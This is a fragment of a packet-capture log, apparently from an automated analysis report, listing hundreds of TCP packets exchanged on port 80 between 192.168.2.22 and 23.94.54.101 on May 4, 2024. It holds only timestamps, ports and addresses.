May 4, 2024 10:02:39.816796064 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816822052 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816823006 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816836119 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816848993 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816868067 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816868067 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816880941 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816895008 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816900969 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816907883 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816920042 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816929102 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816932917 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816951036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816966057 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816970110 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816984892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.816992044 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.816998959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817012072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817022085 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817025900 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817039967 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817047119 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817053080 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817065001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817074060 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817087889 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817095995 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817101002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817115068 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817128897 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817140102 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817161083 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817293882 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817306042 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817317963 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817331076 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817338943 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817342997 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817354918 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817367077 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817368031 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817380905 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817380905 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817394018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817408085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817411900 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817420959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817431927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817440033 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817446947 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817460060 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817470074 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817473888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817487001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817500114 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817513943 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817516088 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817529917 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817536116 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817543030 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817557096 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817569017 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817570925 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817581892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817595005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817605972 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817608118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817620993 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817630053 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817632914 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817645073 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817657948 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817657948 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817671061 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817677975 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817684889 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817698002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817706108 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817711115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817723989 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817732096 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817738056 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817751884 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817761898 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817763090 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817778111 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817792892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817806959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817820072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817825079 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817831993 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817841053 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817841053 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817845106 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817859888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817863941 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817872047 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817884922 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817892075 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817898035 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817919016 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817924023 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817936897 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817944050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817955971 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817967892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817975044 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.817981958 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.817995071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818006039 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818007946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818020105 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818030119 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818031073 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818042994 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818054914 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818057060 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818070889 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818080902 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818084002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818097115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818105936 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818110943 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818125010 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818130016 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818139076 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818151951 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818159103 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818166018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818180084 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818187952 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818213940 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818263054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818275928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818288088 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818300962 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818310022 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818315029 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818326950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818339109 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818342924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818356037 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818368912 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818370104 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818382025 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818394899 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818397999 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818413973 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818414927 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818425894 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818438053 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818450928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818459034 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818464041 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818474054 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818476915 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818490028 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818499088 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818504095 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818516970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818521976 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818531036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818542957 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818552017 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818557024 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818568945 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818577051 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818583012 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818595886 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818603039 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818608999 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818624973 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818633080 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818638086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818650007 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818659067 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818664074 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818676949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818689108 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818690062 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818711996 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818713903 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818727970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818742990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818748951 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818775892 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818905115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818917036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818932056 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818943977 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818950891 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818957090 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818968058 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818974972 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.818979979 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.818986893 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819000006 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819005013 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819011927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819024086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819031954 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819036961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819048882 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819056988 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819061995 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819075108 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819082975 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819087982 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819102049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819112062 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819114923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819128036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819139957 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819139957 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819152117 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819164038 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819164991 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819179058 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819190979 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819197893 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819202900 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819211006 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819236994 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819236994 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819250107 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819262981 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819277048 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819286108 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819289923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819303036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819308996 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819314957 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819327116 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819339991 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819340944 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819353104 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819365025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819366932 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819380045 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819405079 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819405079 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819418907 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819430113 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819432974 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819447041 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819453955 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819461107 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819473028 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819483042 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819487095 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819509983 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819581985 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819593906 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819607019 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819622993 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819627047 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819639921 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819652081 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819653034 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819664955 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819673061 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819679022 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819685936 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819698095 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819710016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819720984 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819722891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819736958 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819744110 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819749117 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819761038 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819768906 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819772959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819787025 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819798946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819812059 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819823980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819837093 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819842100 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819849014 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819858074 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819863081 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819875002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819888115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819890976 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819901943 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819914103 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819919109 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819926977 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819937944 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819945097 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819947004 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819961071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819972038 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.819973946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819988012 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.819996119 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820003033 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820017099 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820027113 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820030928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820043087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820055008 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820084095 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820094109 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820111990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820118904 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820126057 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820132017 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820139885 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820152044 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820164919 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820178032 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820189953 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820200920 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820203066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820215940 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820229053 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820241928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820254087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820257902 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820257902 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820267916 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820276022 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820276022 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820281982 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820287943 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820296049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820307970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820314884 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820321083 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820332050 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820334911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820348024 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820357084 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820360899 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820373058 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820384979 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820384979 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820398092 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820410013 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820413113 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820422888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820436001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820445061 CEST	49161	80	192.168.2.22	23.94.54.101
